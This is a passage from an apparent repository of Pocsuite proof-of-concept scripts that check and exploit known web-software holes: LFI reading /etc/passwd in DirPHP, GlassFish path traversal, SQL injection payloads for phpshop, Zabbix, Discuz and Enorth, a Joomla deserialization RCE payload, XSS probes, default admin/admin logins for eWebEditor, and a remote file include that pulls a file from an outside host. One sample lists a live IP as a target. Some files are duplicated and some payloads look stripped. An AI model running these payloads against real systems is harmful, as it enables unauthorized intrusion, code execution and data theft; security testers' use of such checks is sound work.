28 | appPowerLink = 'http://sourceforge.net/projects/dirphp/'
29 |
30 | appName = 'DirPHP'
31 |
32 | appVersion = '1.0'
33 |
34 | vulType = 'Local File Inclusion'
35 |
36 | desc = '''DirPHP index.php文件在处理传入的参数时存在缺陷,导致产生本地文件包含漏洞。'''
37 |
38 | samples = ['']
39 |
40 |
41 |
42 | def _attack(self):
43 |
44 | return self._verify()
45 |
46 |
47 |
48 | def _verify(self, verify=True):
49 |
50 | result = {}
51 |
52 | vul_url = '%s/index.php?phpfile=/etc/passwd' % self.url
53 |
54 | response = req.get(vul_url, timeout=10).content
55 |
56 |
57 |
58 | if 'bin/bash' in response:
59 |
60 | result['VerifyInfo'] = {}
61 |
62 | result['VerifyInfo']['URL'] = self.url
63 |
64 |
65 |
66 | return self.parse_attack(result)
67 |
68 |
69 |
70 | def parse_attack(self, result):
71 |
72 | output = Output(self)
73 |
74 |
75 |
76 | if result:
77 |
78 | output.success(result)
79 |
80 | else:
81 |
82 | output.fail('failed')
83 |
84 |
85 |
86 | return output
87 |
88 | register(TestPOC)
--------------------------------------------------------------------------------
/Huawei E5331 API验证绕过漏洞.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 |
7 |
8 | class Huawei_E5331_Unauthorized_access(POCBase):
9 | vulID = '61930' # ssvid
10 | version = '1.0'
11 | author = ['anonymous']
12 | vulDate = '2013-12-06'
13 | createDate = '2015-11-13'
14 | updateDate = '2015-11-13'
15 | references = ['http://www.sebug.net/vuldb/ssvid-61930']
16 | name = 'Huawei E5331 API验证绕过漏洞'
17 | appPowerLink = 'http://www.huawei.com'
18 | appName = 'Huawei E355'
19 | appVersion = 'Software version 21.344.11.00.414'
20 | vulType = 'Unauthorized access'
21 | desc = '''
22 | All discovered vulnerabilities can be exploited without authentication and therefore pose a high security risk.
23 | '''
24 | samples = ['']
25 |
26 | def _attack(self):
27 | return self._verify()
28 |
29 | def _verify(self, verify=True):
30 | result = {}
31 | vul_url = '%s/api/wlan/security-settings' % (self.url)
32 | response = req.get(vul_url).content
33 |
34 | if re.search('', response) and re.search('', response):
35 | result['VerifyInfo'] = {}
36 | result['VerifyInfo']['URL'] = vul_url
37 |
38 | return self.parse_attack(result)
39 |
40 | def parse_attack(self, result):
41 | output = Output(self)
42 |
43 | if result:
44 | output.success(result)
45 | else:
46 | output.fail('failed')
47 |
48 | return output
49 |
50 |
51 | register(Huawei_E5331_Unauthorized_access)
--------------------------------------------------------------------------------
/JASmine _= 0.0.2 (index.php) Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
9 | class JASmine_News_Remote_File_Include(POCBase):
10 | vulID = '64073'
11 | version = '1'
12 | vulDate = '2006-10-17'
13 | author = ' '
14 | createDate = '2015-12-16'
15 | updateDate = ' '
16 | references = ['http://www.sebug.net/vuldb/ssvid-64073']
17 | name = 'JASmine <= 0.0.2 (index.php) Remote File Include Vulnerability'
18 | appPowerLink = 'http://www.sourcefiles.org/Utilities/Printer/Jasmine-Web-0.0.2.tar.bz2'
19 | appName = 'JASmine'
20 | appVersion = '<= 0.0.2'
21 | vulType = 'Remote File Inclusion'
22 | desc = 'phpBB PlusXL <= 2.0_272 (constants.php) Remote File Include Exploit'
23 | samples = ['']
24 |
25 |
26 | def _attack(self):
27 | return self._verify()
28 |
29 |
30 | def _verify(self):
31 | result = {}
32 | vul_url = '%s/index.php?section=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
33 | response = req.get(vul_url).content
34 |
35 | if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
36 | result['VerifyInfo'] = {}
37 | result['VerifyInfo']['URL'] = self.url
38 |
39 |
40 | return self.parse_attack(result)
41 |
42 |
43 | def parse_attack(self, result):
44 | output = Output(self)
45 |
46 | if result:
47 | output.success(result)
48 | else:
49 | output.fail('failed')
50 |
51 | return output
52 |
53 | register(JASmine_PlusXL_News_Remote_File_Include)
--------------------------------------------------------------------------------
/eWebEditor 弱密码漏洞.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 |
7 |
8 | class TestPOC(POCBase):
9 | vulID = '62352' # ssvid
10 | version = '1.0'
11 | author = ['']
12 | vulDate = '2013-04-23'
13 | createDate = '2016-03-07'
14 | updateDate = '2016-03-07'
15 | references = ['http://www.seebug.org/vuldb/ssvid-62352']
16 | name = 'eWebEditor 弱密码漏洞'
17 | appPowerLink = 'http://www.ewebeditor.net/'
18 | appName = 'eWebEditor'
19 | appVersion = 'ALL'
20 | vulType = 'Weak Password'
21 | desc = '''
22 | ewebeditor默认情况下, 可用弱口令登录,从而导致攻击者可据此信息进行后续攻击。
23 | '''
24 | samples = ['']
25 |
26 | def _attack(self):
27 | return self._verify()
28 |
29 | def _verify(self):
30 | result = {}
31 | paths = ["/admin_login.asp","/admin/ewebeditor/admin_login.asp", "/edit/admin_login.asp", "/ewebeditor/admin_login.asp", "/admin/login.php"]
32 | for path in paths:
33 | target = "%s%s?action=login&usr=admin&pwd=admin" % (self.url, path)
34 | res = req.get(target)
35 | if "admin_default.asp" in res.url and "href='admin_login.asp'" in res.content and "eWebEditor" in res.content:
36 | result['VerifyInfo'] = {}
37 | result['VerifyInfo']['URL'] = res.url
38 |
39 | return self.parse_output(result)
40 |
41 | def parse_output(self, result):
42 | #parse output
43 | output = Output(self)
44 | if result:
45 | output.success(result)
46 | else:
47 | output.fail('Internet nothing returned')
48 | return output
49 |
50 |
51 | register(TestPOC)
52 |
--------------------------------------------------------------------------------
/GlassFish 任意文件读取漏洞.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 |
6 | from pocsuite.net import req
7 | from pocsuite.poc import POCBase, Output
8 | from pocsuite.utils import register
9 |
10 |
11 | class TestPOC(POCBase):
12 | vulID = '90437'
13 | version = '1'
14 | author = 'RickGray'
15 | vulDate = '2016-01-14'
16 | createDate = '2016-01-14'
17 | updateDate = '2016-01-14'
18 | references = [
19 | 'https://www.sebug.net/vuldb/ssvid-90437',
20 | 'http://www.oracle.com/us/products/middleware/cloud-app-foundation/glassfish-server/overview/index.html',
21 | 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'
22 | ]
23 | name = 'GlassFish <= 4.1.0 任意文件读取漏洞 POC'
24 | appPowerLink = 'https://glassfish.java.net'
25 | appName = 'GlassFish'
26 | appVersion = '<= 4.1.0'
27 | vulType = 'Arbitrary File Read'
28 | desc = '''
29 |
30 | '''
31 |
32 | samples = []
33 |
34 | def _verify(self):
35 | v_url = '/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF'
36 | response = req.get(self.url + v_url)
37 |
38 | return self.parse_verify(response)
39 |
40 | def _attack(self):
41 | return self._verify()
42 |
43 | def parse_verify(self, response):
44 | output = Output(self)
45 | result = {}
46 |
47 | if re.search(r'Manifest-Version|Mainfest.*Versioin', response.content):
48 | result['VerifyInfo'] = {}
49 | result['VerifyInfo']['URL'] = response.url
50 | output.success(result)
51 | else:
52 | output.fail('Failed to read file or not be vulnerable')
53 |
54 | return output
55 |
56 |
57 | register(TestPOC)
58 |
--------------------------------------------------------------------------------
/_160615_GlassFish_410_file_read.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 |
6 | from pocsuite.net import req
7 | from pocsuite.poc import POCBase, Output
8 | from pocsuite.utils import register
9 |
10 |
11 | class TestPOC(POCBase):
12 | vulID = '90437'
13 | version = '1'
14 | author = 'RickGray'
15 | vulDate = '2016-01-14'
16 | createDate = '2016-01-14'
17 | updateDate = '2016-01-14'
18 | references = [
19 | 'https://www.sebug.net/vuldb/ssvid-90437',
20 | 'http://www.oracle.com/us/products/middleware/cloud-app-foundation/glassfish-server/overview/index.html',
21 | 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'
22 | ]
23 | name = 'GlassFish <= 4.1.0 任意文件读取漏洞 POC'
24 | appPowerLink = 'https://glassfish.java.net'
25 | appName = 'GlassFish'
26 | appVersion = '<= 4.1.0'
27 | vulType = 'Arbitrary File Read'
28 | desc = '''
29 |
30 | '''
31 |
32 | samples = []
33 |
34 | def _verify(self):
35 | v_url = '/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF'
36 | response = req.get(self.url + v_url)
37 |
38 | return self.parse_verify(response)
39 |
40 | def _attack(self):
41 | return self._verify()
42 |
43 | def parse_verify(self, response):
44 | output = Output(self)
45 | result = {}
46 |
47 | if re.search(r'Manifest-Version|Mainfest.*Versioin', response.content):
48 | result['VerifyInfo'] = {}
49 | result['VerifyInfo']['URL'] = response.url
50 | output.success(result)
51 | else:
52 | output.fail('Failed to read file or not be vulnerable')
53 |
54 | return output
55 |
56 |
57 | register(TestPOC)
58 |
--------------------------------------------------------------------------------
/Dream4 Koobi CMS 4.2.3 Index.PHP Cross-Site Scripting Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 | from urlparse import urljoin
8 |
9 | class TestPOC(POCBase):
10 | vulID = 'SSV-78938' # vul ID
11 | version = '1'
12 | author = 'hzr'
13 | vulDate = '2005-03-24'
14 | createDate = '2015-10-26'
15 | updateDate = '2015-10-26'
16 | references = ['https://www.exploit-db.com/exploits/25272/','http://www.securityfocus.com/bid/12895/info']
17 | name = "Dream4 Koobi CMS 4.2.3 Index.PHP Cross-Site Scripting Vulnerability"
18 | appPowerLink = 'http://www.dream4.de/index.htm'
19 | appName = 'Dream4 Koobi CMS'
20 | appVersion = '4.2.3'
21 | vulType = 'XSS'
22 | desc = '''
23 | Dream4 Koobi CMS 4.2.3的index.php中存在跨站脚本攻击(XSS)漏洞,
24 | 远程攻击者可以通过area参数注入任意Web脚本或HTML。
25 | '''
26 | # the sample sites for examine
27 | samples = ['']
28 |
29 | def _verify(self):
30 | payload = '/index.php?area='
31 | res = req.get(urljoin(self.url, payload), timeout=10)
32 | return self.parse_verify(res, payload, 'xss')
33 |
34 | def parse_verify(self, res, payload, type):
35 | output = Output(self)
36 | result = {}
37 | if type == 'xss' and '' in res.content:
38 | result['VerifyInfo'] = {}
39 | result['VerifyInfo']['URL'] = urljoin(self.url, payload)
40 | output.success(result)
41 | else:
42 | output.fail('Internet Nothing returned')
43 | return output
44 |
45 | def _attack(self):
46 | return self._verify()
47 |
48 | register(TestPOC)
--------------------------------------------------------------------------------
/_130423_eWebEditor_all_weak_password.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 |
7 |
8 | class TestPOC(POCBase):
9 | vulID = '62352' # ssvid
10 | version = '1.0'
11 | author = ['']
12 | vulDate = '2013-04-23'
13 | createDate = '2016-03-07'
14 | updateDate = '2016-03-07'
15 | references = ['http://www.seebug.org/vuldb/ssvid-62352']
16 | name = 'eWebEditor 弱密码漏洞'
17 | appPowerLink = 'http://www.ewebeditor.net/'
18 | appName = 'eWebEditor'
19 | appVersion = 'ALL'
20 | vulType = 'Weak Password'
21 | desc = '''
22 | ewebeditor默认情况下, 可用弱口令登录,从而导致攻击者可据此信息进行后续攻击。
23 | '''
24 | samples = ['']
25 |
26 | def _attack(self):
27 | return self._verify()
28 |
29 | def _verify(self):
30 | result = {}
31 | paths = ["/admin_login.asp", "/admin/ewebeditor/admin_login.asp",
32 | "/edit/admin_login.asp",
33 | "/ewebeditor/admin_login.asp", "/admin/login.php"]
34 | for path in paths:
35 | target = "%s%s?action=login&usr=admin&pwd=admin" % (self.url, path)
36 | res = req.get(target)
37 | if "admin_default.asp" in res.url and "href='admin_login.asp'" in res.content and "eWebEditor" in res.content:
38 | result['VerifyInfo'] = {}
39 | result['VerifyInfo']['URL'] = res.url
40 | return self.parse_output(result)
41 |
42 | def parse_output(self, result):
43 | # parse output
44 | output = Output(self)
45 | if result:
46 | output.success(result)
47 | else:
48 | output.fail('Internet nothing returned')
49 | return output
50 |
51 |
52 | register(TestPOC)
53 |
--------------------------------------------------------------------------------
/CMS phpshop 2.0 - SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 | import re
8 |
9 | class TestPOC(POCBase):
10 | vulID = 'SSV-77845' # vul ID
11 | version = '1'
12 | author = ['hh']
13 | vulDate = '2013-01-14'
14 | createDate = '2015-10-16'
15 | updateDate = '2015-10-16'
16 | references = ['https://www.exploit-db.com/exploits/24108/']
17 | name = 'CMS phpshop 2.0 - SQL Injection Vulnerability'
18 | appPowerLink = 'http://code.google.com/p/phpshop/downloads/list'
19 | appName = 'phpshop'
20 | appVersion = '2.0'
21 | vulType = 'SQL Injection'
22 | desc = '''
23 | ?page=admin/function_list&module_id=11 id变量未正确过滤,导致SQL注入漏洞
24 | '''
25 | # the sample sites for examine
26 | samples = ['']
27 |
28 | def _verify(self):
29 | result = {}
30 | target_url = "/phpshop 2.0/?page=admin/function_list&module_id=11' union select 1,CONCAT(0x7162787671,0x50664e68584e4c584352,0x716a717171),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --"
31 | response = req.get(self.url + target_url, headers=self.headers, timeout=10)
32 | content = response.content
33 | match = re.search('qbxvqPfNhXNLXCRqjqqq',content)
34 | if match:
35 | result['VerifyInfo'] = {}
36 | result['VerifyInfo']['URL'] = self.url + target_url
37 | return self.parse_attack(result)
38 |
39 | def _attack(self):
40 | return self._verify()
41 |
42 | def parse_attack(self, result):
43 | output = Output(self)
44 | if result:
45 | output.success(result)
46 | else:
47 | output.fail('Internet Nothing returned')
48 | return output
49 |
50 | register(TestPOC)
--------------------------------------------------------------------------------
/_170826_Zabbix_303_SQL_Injection.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 | from pocsuite.api.request import req
5 | from pocsuite.api.poc import register
6 | from pocsuite.api.poc import Output, POCBase
7 |
8 |
9 | class TestPOC(POCBase):
10 | vulID = '00004'
11 | version = '1'
12 | author = 'jeffzhang'
13 | vulDate = '2017-08-26'
14 | createDate = '2017-08-26'
15 | updateDate = '2017-08-26'
16 | references = ['http://www.freebuf.com/vuls/112197.html']
17 | name = 'Zabbix SQl 注入漏洞 PoC'
18 | appPowerLink = 'https://www.zabbix.com'
19 | appName = 'Zabbix'
20 | appVersion = '3.0.3'
21 | vulType = 'SQL Injection'
22 | desc = '''
23 | Zabbix 2.2.x和3.0.x版本中存在两处基于错误回显的SQL注入漏洞
24 | '''
25 | samples = ['http://89.239.138.140:5001/']
26 |
27 | def _verify(self):
28 | result = {}
29 | payload = payload = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
30 | att_url = self.url + payload
31 | response = req.get(att_url)
32 | if "You have an error in your SQL syntax" in response.content:
33 | result['VerifyInfo'] = {}
34 | result['VerifyInfo']['URL'] = self.url
35 | result['VerifyInfo']['Payload'] = payload
36 | return self.parse_attack(result)
37 |
38 | def _attack(self):
39 | return self._verify()
40 |
41 | def parse_attack(self, result):
42 | output = Output(self)
43 | if result:
44 | output.success(result)
45 | else:
46 | output.fail('Internet noting return')
47 | return output
48 |
49 |
50 | register(TestPOC)
51 |
--------------------------------------------------------------------------------
/FlexCMS 2.5 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 | from urlparse import urljoin
8 |
9 | class TestPOC(POCBase):
10 | vulID = 'SSV-85553' # vul ID
11 | version = '1'
12 | author = 'fenghh'
13 | vulDate = '2008-08-15'
14 | createDate = '2015-10-17'
15 | updateDate = '2015-10-17'
16 | references = ['https://www.exploit-db.com/exploits/32254/']
17 | name = "FlexCMS 2.5 - 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting Vulnerability"
18 | appPowerLink = 'http://www.flexcms.com/'
19 | appName = 'FlexCMS'
20 | appVersion = '2.5'
21 | vulType = 'XSS'
22 | desc = '''
23 | FlexCMS是一套网站内容管理系统。
24 | FlexCMS 2.5以及之前的版本中的inc-core-admin-editor-previouscolorsjs.php存在跨站脚本攻击漏洞,
25 | 当register_globals选项被激活时,远程攻击者可以借助reviousColorsString参数,
26 | 注入任意的web脚本或HTML。
27 | '''
28 | # the sample sites for examine
29 | samples = ['']
30 |
31 | def _verify(self):
32 | payload_xss = "/inc-core-admin-editor-previouscolorsjs.php?PreviousColorsString=%3Cscript%3Ealert(/SebugTest/)%3C/script%3E"
33 | res = req.get(urljoin(self.url, payload_xss), timeout=5)
34 | return self.parse_verify(res)
35 |
36 | def parse_verify(self, res):
37 | output = Output(self)
38 | result = {}
39 | if '>alert(/SebugTest/)' in res.content:
40 | result['VerifyInfo'] = {}
41 | result['VerifyInfo']['URL'] = self.url
42 | output.success(result)
43 | else:
44 | output.fail('Internet Nothing returned')
45 | return output
46 |
47 | def _attack(self):
48 | return self._verify()
49 |
50 | register(TestPOC)
--------------------------------------------------------------------------------
/FotoWeb 6.0 Login.fwx s Parameter XSS.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 | from urlparse import urljoin
8 |
9 | class TestPOC(POCBase):
10 | vulID = 'SSV-86055' # vul ID
11 | version = '1'
12 | author = 'hhxx'
13 | vulDate = '2009-02-09'
14 | createDate = '2015-10-22'
15 | updateDate = '2015-10-22'
16 | references = ['https://www.exploit-db.com/exploits/32782/']
17 | name = "FotoWeb 6.0 Login.fwx s Parameter XSS"
18 | appPowerLink = 'www.fotoware.com'
19 | appName = 'FotoWeb'
20 | appVersion = '6.0'
21 | vulType = 'XSS'
22 | desc = '''
23 | FotoWeb 是针对网站发布内容包括文档、图片、pdf、视频等实现归档的工具。
24 | FotoWeb 6.0 (Build 273)版本中存在多个跨站脚本攻击漏洞。
25 | 远程攻击者可以借助(1)对cmdrequest/Login.fwx的s参数和(2)对Grid.fwx的搜索参数,
26 | 注入任意web脚本或HTML。
27 | CVEID:CVE-2009-0573
28 | CNNVDID:CNNVD-200902-327
29 | '''
30 | # the sample sites for examine
31 | samples = ['']
32 |
33 | def _verify(self):
34 | payload = '/fotoweb/cmdrequest/Login.fwx?s=">'
35 | res = req.get(urljoin(self.url, payload), timeout=5)
36 | return self.parse_verify(res, payload, 'xss')
37 |
38 | def parse_verify(self, res, payload, type):
39 | output = Output(self)
40 | result = {}
41 | if type == 'xss' and '>alert(/Sebug23333Test/)' in res.content:
42 | #返回页面包含构造的特殊字段,说明xss存在
43 | result['VerifyInfo'] = {}
44 | result['VerifyInfo']['URL'] = urljoin(self.url, payload)
45 | output.success(result)
46 | else:
47 | output.fail('Internet Nothing returned')
48 | return output
49 |
50 | def _attack(self):
51 | return self._verify()
52 |
53 | register(TestPOC)
--------------------------------------------------------------------------------
/Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from urlparse import urljoin
5 | from pocsuite.net import req
6 | from pocsuite.poc import POCBase, Output
7 | from pocsuite.utils import register
8 |
9 |
10 | class TestPOC(POCBase):
11 | vulID = '89306' # vul ID
12 | version = '1'
13 | author = ['cnyql']
14 | vulDate = '2015-09-02'
15 | createDate = '2015-09-02'
16 | updateDate = '2015-09-12'
17 | references = ['http://www.sebug.net/vuldb/ssvid-89306']
18 | name = 'Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp'
19 | appPowerLink = 'http://webpublisher.enorth.com.cn/'
20 | appName = 'Enorth Webpublisher CMS'
21 | appVersion = 'unknown'
22 | vulType = 'SQL Injection'
23 | desc = '''
24 | Enorth Webpublisher CMS so far of the scale of tens of thousands of web sites, with the government, enterprises, scientific research and education and media industries fields such as nearly thousands of business users.
25 | '''
26 |
27 | def _verify(self):
28 | payload = "pub/m_pending_news/delete_pending_news.jsp?cbNewsId=1)%20and%201=ctxsys.drithsx.sn(1,(Utl_Raw.Cast_To_Raw(sys.dbms_obfuscation_toolkit.md5(input_string => '3.14'))))?"
29 | # ORACLE ERROR BASED INJ
30 |
31 | res = req.get(urljoin(self.url, payload), timeout=5)
32 | return self.parse_verify(res, payload)
33 |
34 | def parse_verify(self, res, payload):
35 | output = Output(self)
36 | result = {}
37 |
38 | if '4beed3b9c4a886067de0e3a094246f78' in res.content:
39 | result['VerifyInfo'] = {}
40 | result['VerifyInfo']['URL'] = urljoin(self.url, payload)
41 | output.success(result)
42 |
43 | else:
44 | output.fail('Internet Nothing returned')
45 |
46 | return output
47 |
48 |
49 | register(TestPOC)
50 |
--------------------------------------------------------------------------------
/_170826_Joomla_345_RCE.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 | from pocsuite.api.request import req
5 | from pocsuite.api.poc import register
6 | from pocsuite.api.poc import Output, POCBase
7 |
8 | class TestPOC(POCBase):
9 | vulID = '00003'
10 | version = '1'
11 | author = 'jeffzhang'
12 | vulDate = '2017-08-26'
13 | createDate = '2017-08-26'
14 | updateDate = '2017-08-26'
15 | references = ['http://cxsecurity.com/cveshow/CVE-2015-8562/']
16 | name = 'Joomla 反序列化漏洞 PoC'
17 | appPowerLink = 'https://www.joomla.org'
18 | appName = 'Joomla'
19 | appVersion = '3.4.5'
20 | vulType = 'RCE'
21 | desc = '''
22 | 漏洞存在于反序列化session的过程中
23 | '''
24 | samples = ['']
25 |
26 | def _verify(self):
27 | result = {}
28 | payload = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86'
29 | headers = {'User-Agent': payload}
30 | response = req.get(self.url, headers=headers, timeout=1)
31 | #response2 = req.get(self.url)
32 | if 'SERVER["REMOTE_ADDR"]' in response.content:
33 | result['VerifyInfo'] = {}
34 | result['VerifyInfo']['URL'] = self.url
35 | result['VerifyInfo']['Payload'] = payload
36 | return self.parse_attack(result)
37 | def _attack(self):
38 | return self._verify()
39 | def parse_attack(self, result):
40 | output = Output(self)
41 | if result:
42 | output.success(result)
43 | else:
44 | output.fail('Internet noting return')
45 | return output
46 | register(TestPOC)
--------------------------------------------------------------------------------
/Discuz! Plugin JiangHu _= 1.1 (id) SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 | import re
8 |
9 | class TestPOC(POCBase):
10 | vulID = 'SSV-12193' # vul ID
11 | version = '1'
12 | author = ['hh']
13 | vulDate = '2009-09-02'
14 | createDate = '2015-10-21'
15 | updateDate = '2015-10-21'
16 | references = ['https://www.exploit-db.com/exploits/9576/']
17 | name = 'Discuz! Plugin JiangHu <= 1.1 (id) SQL Injection Vulnerability'
18 | appPowerLink = 'www.discuz.net'
19 | appName = 'Discuz! Plugin JiangHu Inn'
20 | appVersion = '1.1'
21 | vulType = 'SQL Injection'
22 | desc = '''
23 | Discuz!中的JiangHu Inn plugin 1.1及其早期版本中存在SQL注入漏洞,
24 | 远程攻击者可以借助 forummission.php的显示操作中的id参数执行任意SQL指令。
25 | d0rk : inurl:forummission.php
26 | '''
27 | # the sample sites for examine
28 | samples = ['']
29 |
30 | def _verify(self):
31 | result = {}
32 | target_url = "/forummission.php?index=show&id=24 and+1=2+union+select+1,2,concat(0x7162787671,0x50664e68584e4c584352,0x716a717171),4,5,6,7,8,9,10,11 from cdb_members--"
33 | response = req.get(self.url + target_url, headers=self.headers, timeout=10)
34 | content = response.content
35 | match = re.search('qbxvqPfNhXNLXCRqjqqq',content)
36 | #拼接一个特殊字符串,验证concat函数是否成功执行
37 | if match:
38 | result['VerifyInfo'] = {}
39 | result['VerifyInfo']['URL'] = self.url + target_url
40 | return self.parse_attack(result)
41 |
42 | def _attack(self):
43 | return self._verify()
44 |
45 | def parse_attack(self, result):
46 | output = Output(self)
47 | if result:
48 | output.success(result)
49 | else:
50 | output.fail('Internet Nothing returned')
51 | return output
52 |
53 | register(TestPOC)
--------------------------------------------------------------------------------
/MyBB 1.6.5 suffers from a cross site scripting vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 |
8 | import requests
9 |
10 | '''
11 | 原始利用链接:
12 | /tags.php?tag=">
13 | '''
14 |
15 | class TestPOC(POCBase):
16 | vulID = '26119' # ssvid
17 | version = '1.0'
18 | author = ['XXXX']
19 | vulDate = ''
20 | createDate = '2016-01-25'
21 | updateDate = '2016-01-25'
22 | references = ['http://www.seebug.org/vuldb/ssvid-26119']
23 | name = 'MyBB 1.6.5 suffers from a cross site scripting vulnerability'
24 | appPowerLink = 'http://www.mybboard.net/'
25 | appName = 'MyBB'
26 | appVersion = '1.6.5'
27 | vulType = 'XSS'
28 | desc = '''
29 | MyBB 1.6.5 tags.php 存在跨站脚本漏洞
30 | '''
31 | samples = ['']
32 |
33 | def _verify(self):
34 | result = {}
35 |
36 | # 较之前poc加入rstip()使URL规范化
37 | # 使用prompt(/SEBUG@TEST/)替代prompt("SEBUG@TEST"),因为发现有的网站会转义双引号
38 | vulurl = self.url.rstrip('/') + '/tags.php?tag=">'
39 |
40 | # 较之前poc加入异常处理机制
41 | try:
42 | # 较之前poc加入过期时间,禁用SSL证书认证:降低等待时间、排除SSL认证失败错误
43 | r = requests.get(vulurl,timeout=15,verify=False)
44 | if '' in r.content:
45 | result['XSSInfo'] = {}
46 | result['XSSInfo']['URL'] = r.url
47 | except Exception, e:
48 | raise e
49 |
50 | return self.parse_output(result)
51 |
52 | def _attack(self):
53 | return self._verify()
54 |
55 | def parse_output(self, result):
56 | #parse output
57 | output = Output(self)
58 | if result:
59 | output.success(result)
60 | else:
61 | output.fail('Internet nothing returned')
62 | return output
63 |
64 | register(TestPOC)
--------------------------------------------------------------------------------
/Apple Macintosh OS X .DS_Store 信息泄露漏洞.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | import re
4 |
5 | from pocsuite.net import req
6 | from pocsuite.poc import POCBase, Output
7 | from pocsuite.utils import register
8 |
9 | from ds_store import DSStore
10 |
11 | class TestPOC(POCBase):
12 | vulID = '1729' # vul ID
13 | version = '1'
14 | author = ['ricter']
15 | vulDate = '2015-03-09'
16 | createDate = '2015-03-09'
17 | updateDate = '2015-03-09'
18 | references = ['http://www.securityfocus.com/bid/3324/discuss']
19 | name = 'Apple Macintosh OS X .DS_Store Information Disclosure'
20 | appPowerLink = 'http://www.apple.com'
21 | appName = 'Apple Macintosh OS X'
22 | appVersion = 'all version'
23 | vulType = 'Information Disclosure'
24 | desc = '''
25 | 在开发过程中开发者可能会把 .DS_Store 文件上传到网站上导致
26 | 信息泄露漏洞。
27 | '''
28 |
29 | samples = ['']
30 | install_requires = ['ds_store==1.0.1']
31 |
32 | def _attack(self):
33 | return self._verify()
34 |
35 | def _verify(self):
36 | result = {}
37 | url = '%s/.DS_Store' % self.url
38 | response = req.get(url).content
39 | filelist = []
40 | if '\x00\x00\x00\x01\x42\x75\x64\x31' in response:
41 | try:
42 | with DSStore.open(response, 'r+') as obj:
43 | for i in obj:
44 | filelist.append(i.filename)
45 | except Exception, e:
46 | print '[-] Error: %s' % str(e)
47 | result['FileInfo'] = {}
48 | result['FileInfo']['Filename'] = url
49 | result['FileInfo']['Content'] = set(list(filelist))
50 |
51 | return self.parse_attack(result)
52 |
53 | def parse_attack(self, result):
54 | output = Output(self)
55 | if result:
56 | output.success(result)
57 | else:
58 | output.fail('Internet nothing returned')
59 | return output
60 |
61 |
62 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Spider Calendar _= 3.2.6 - SQL Injection.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 |
4 |
5 |
6 | from pocsuite.net import req
7 |
8 | from pocsuite.poc import Output, POCBase
